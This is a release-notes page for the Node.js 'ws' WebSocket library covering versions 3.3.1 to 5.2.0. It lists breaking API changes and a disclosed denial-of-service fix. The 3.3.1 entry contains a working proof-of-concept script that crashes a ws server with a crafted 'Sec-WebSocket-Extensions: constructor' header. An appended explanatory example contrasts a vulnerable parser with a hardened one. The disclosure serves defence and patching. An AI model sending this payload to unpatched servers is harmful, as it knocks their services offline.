Releases: websockets/ws
5.2.0
5.1.1
5.1.0
5.0.0
Breaking changes
- Dropped support for Node.js < 4.5.0 (#1313).
- The connection is no longer closed if the server does not agree to any of
the client's requested subprotocols (#1312).
- `net.Socket` errors are no longer re-emitted (a4050db).
Features
- Read backpressure is now properly handled when permessage-deflate is enabled
(#1302).
4.1.0
4.0.0
Breaking changes
- The close status code is now set to 1005 if the received close frame contains
no status code (a31b1f6).
- Error messages and types have been updated (695c5ea).
- The `onerror` event handler now receives an `ErrorEvent` instead of a
JavaScript error (63e275e).
- The third argument of `WebSocket.prototype.ping()` and
`WebSocket.prototype.pong()` is no longer a boolean but an optional callback
(30c9f71).
- The non-standard `protocolVersion` and `bytesReceived` attributes have been
removed (30c9f71...ee9b5f3).
- The `extensions` attribute is no longer an object but a string representing
the extensions selected by the server (fdec524).
- The `'headers'` event on the client has been renamed to `'upgrade'`. Listeners
of this event now receive only the `response` argument (1c783c2).
- The `WebSocket.prototype.pause()` and `WebSocket.prototype.resume()` methods
have been removed to prevent the user from interfering with the state of the
underlying `net.Socket` stream (a206e98).
3.3.3
3.3.2
3.3.1
Bug fixes
- Fixed a DoS vulnerability (c4fe466).
A specially crafted value of the `Sec-WebSocket-Extensions` header that
used `Object.prototype` property names as extension or parameter names
could be used to make a ws server crash.
```js
const WebSocket = require('ws');
const net = require('net');

// Start a ws server; the callback runs once it is listening.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'

  // Raw upgrade request carrying the crafted extension header.
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  // Send the request over a plain TCP socket.
  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```
The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!
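
The failure mode described above, as an added example that is not code from the ws project: a simplified `Sec-WebSocket-Extensions` parser run once with plain `{}` lookup tables and once with prototype-less tables. The names `parseExtensions`, `parseNaive`, `parseHardened` and `outcome` are hypothetical, and the sample header values are constructed.

```javascript
// Simplified Sec-WebSocket-Extensions parser (illustrative; not the ws source).
// `makeTable` supplies the container used to index names taken from the header.
function parseExtensions(header, makeTable) {
  const offers = makeTable();
  for (const part of header.split(',')) {
    const params = part.split(';').map((s) => s.trim());
    const name = params.shift();
    if (!name) continue;
    // With a plain {} table, offers['constructor'] resolves to the inherited
    // Object function, so the "|| []" default is never applied.
    const list = (offers[name] = offers[name] || []);
    const parsed = makeTable();
    for (const param of params) {
      if (!param) continue;
      const [key, value = true] = param.split('=');
      // Same hazard for parameter names: an inherited value has no usable push().
      (parsed[key] = parsed[key] || []).push(value);
    }
    list.push(parsed);
  }
  return offers;
}

// Weak form: tables inherit from Object.prototype.
const parseNaive = (h) => parseExtensions(h, () => ({}));
// Hardened form: tables have no prototype, so only names set by the parser exist.
const parseHardened = (h) => parseExtensions(h, () => Object.create(null));

// Returns 'ok' or the error name. In a server, an uncaught error at this
// point is what takes the process down.
function outcome(parse, header) {
  try {
    parse(header);
    return 'ok';
  } catch (err) {
    return err.name;
  }
}

// Constructed sample header values.
const samples = [
  'permessage-deflate; client_max_window_bits',
  'constructor',
  'permessage-deflate; constructor'
];
for (const h of samples) {
  console.log(JSON.stringify(h), outcome(parseNaive, h), outcome(parseHardened, h));
}
```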